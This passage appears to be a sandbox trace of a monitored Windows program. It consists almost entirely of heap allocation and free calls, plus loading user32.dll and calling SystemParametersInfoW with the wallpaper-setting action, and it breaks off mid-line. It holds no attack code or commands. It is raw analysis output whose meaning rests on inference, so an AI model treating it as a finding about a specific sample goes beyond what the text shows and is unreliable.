[0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0279.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0279.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0279.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0279.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0279.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0279.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0279.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0279.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0279.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0279.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0279.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0279.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0279.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0279.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0279.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0279.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0279.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0279.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0279.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0279.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0279.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0279.537] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0279.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0279.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0279.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0279.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69988 [0279.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69988, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0279.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0279.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0279.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0279.539] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0279.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0279.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0279.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0279.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0279.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0279.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0279.539] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0279.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0279.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0279.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0279.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0279.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0279.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0279.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0279.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0279.615] FreeLibrary (hLibModule=0x750c0000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0279.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0279.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0279.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0279.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0279.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0279.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0279.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0279.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: 